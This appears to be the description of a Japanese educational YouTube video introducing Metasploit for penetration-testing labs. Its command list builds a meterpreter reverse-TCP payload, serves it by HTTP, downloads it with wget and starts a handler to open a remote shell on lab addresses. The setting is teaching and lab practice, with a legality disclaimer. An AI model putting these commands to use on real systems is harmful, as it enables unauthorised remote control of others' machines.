【遠隔操作の恐怖...】Metasploitとは？ まるでハッ〇ーになった気分！ 「ハッキング・ラボのつくりかた完全版」でも使われるツール！ No.143

今回は「Metasploit」を解説します。
Metasploitはペネトレーションテスト（侵入テスト）や脆弱性診断に使われるオープンソースのツールキットです。
IPUSIONさんの書籍「ハッキング・ラボのつくりかた完全版」でも使用されているツールです。
本動画では、リバースシェルを作り、セッション確立までを行います。
ペネトレーションテストや脆弱性評価のために広く使われているオープンソースツール「Metasploit」の基本について解説します。
Metasploitの歴史、主要な機能、使い方の流れ、そしてリバースシェルを活用した攻撃手法を分かりやすく説明します。

動画制作にあたり、ハッカー書籍ではレジェンド的存在の「IPUSIRON」さんが書かれました、
『ハッキング・ラボのつくりかた 完全版 仮想環境におけるハッカー体験学習』を参考に動画制作しております。
注：動画制作にあたり、IPUSIRONさんご本人の許可を得ております。

＜Metasploitの主要コンポーネント＞
msfconsole: Metasploitの主要なコマンドラインインターフェース。
モジュール: エクスプロイト、ペイロード、エンコーダー、ノップスなどの説明。
データベース: 脆弱性の管理とスキャン結果の格納に使う部分。

▼重要な注意事項
動画の内容を実施する場合、法的および倫理的な側面に留意し、
合法的なネットワーク許可を得た場合にのみ使用するようにしてください。
セキュリティツールは適切に使用されるべきであり、
不正アクセスや不正行為には使用してはいけません。
セキュリティテストは合法的で倫理的な方法で行うべきです。

---------------------------------------
【目次】
00:00 オープニング
00:49 Metasploitとは？
01:30 Metasploitの開発者
02:42 Metasploitのバージョン
03:35 Metasploitの機能
05:37 Metasploitの使い方！
06:41 使ってみよう！
07:04 ペイロードを作ってみよう！
09:07 リバースシェルの待ち受け設定
09:38 セッションの確立！
10:48 現実的なペイロード実行の課題
12:31 まとめ
14:13 エンディング

---------------------------------------

動画で使ったコマンド
info payloads/linux/x86/meterpreter_reverse_tcp

msfvenom --payload linux/x86/meterpreter_reverse_tcp --platform linux --arch x86 LHOST=192.168.179.17 LPORT=4444 --format elf --out ~/Desktop/evil

sudo python3 -m http.server 80
wget http://192.168.179.17:80/evil-


use exploit/multi/handler
set payload linux/x86/meterpreter_reverse_tcp
set LHOST 192.168.179.17
set LPORT 4444
show options
exploit


ls -l evil
chmod +x evil
./evil


★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆
▼書籍の購入はコチラ！　
『ハッキング・ラボのつくりかた 完全版 仮想環境におけるハッカー体験学習』は、下記のリンクより購入出来ます。
当チャンネルの視聴者の皆様なら、購入しても損はない書籍と思います。

▼ハッキング・ラボのつくりかた 完全版（2024年2月20日発売の新刊！！）
　⇒新刊では、『Parrot OS』でのハッキング環境構築になります。

・Amazon（紙 or Kindle版）
https://www.amazon.co.jp/dp/4798174572/

・翔泳社の公式通販SEshop
こちらは紙 or PDF版が購入出来ます。
初回であれば500円分のポイントと、紙とPDF版をセットで買うと15%分のポイントが貰えます。
https://www.seshop.com/product/detail...

★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆

▼IPUSIRONさんのX（Twitter）
  / ipusiron  

▼IPUSIRONさんのサイト Security Akademeia【セキュリティアカデメイア】
https://akademeia.info/

★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆★☆
▼Git-Hub
https://github.com/rapid7/metasploit-...


▼参考サイト
https://ja.wikipedia.org/wiki/Metasploit
https://tech-blog.rakus.co.jp/entry/2...

---------------------------------------
★公式ブログ
https://yukuri-it-channel.com/

★当チャンネルのSNSアカウント
不審なアカウントでなければ、基本的にフォローバック致します。
また、プロフィール設定が初期設定 or 鍵垢は、スパム被害防止のため、フォローバックは致しません。

X（Twitter）
  / yukuri_it  
Instagram
  / yukuri_it_channel  
threads
http://threads.net/@yukuri_it_channel

★お問い合わせ
[email protected]

---------------------------------------

▼クレジット
・使用BGM
冒頭：Morning フリーBGM DOVASYNDROME OFFICIAL YouTube CHANNEL
本編：Good Morning Sunshine フリーBGM DOVASYNDROME OFFICIAL YouTube CHANNEL
終盤：NEFFEX Believe Instrumental
エンディング：春よ強く美しく フリーBGM DOVASYNDROME OFFICIAL YouTube CHANNEL

・使用素材
YouTuberのための素材屋さん
https://ytsozaiyasan.com/

#-------------------------------------------------------
#Metasploit #IPUSION #ハッキングラボ
#リバースシェル
#ゆっくりITちゃんねる #ゆっくりIT
#プログラミング #プログラミング言語 #PG言語
#プログラマー #プログラミング教育 #PG
#システムエンジニア #システム #システム開発 #エンジニア #SE
#IT資格 #SE資格
#ゆっくり #ゆっくり解説 #ゆっくりボイス
#東方プロジェクト #東方Project
#-------------------------------------------------------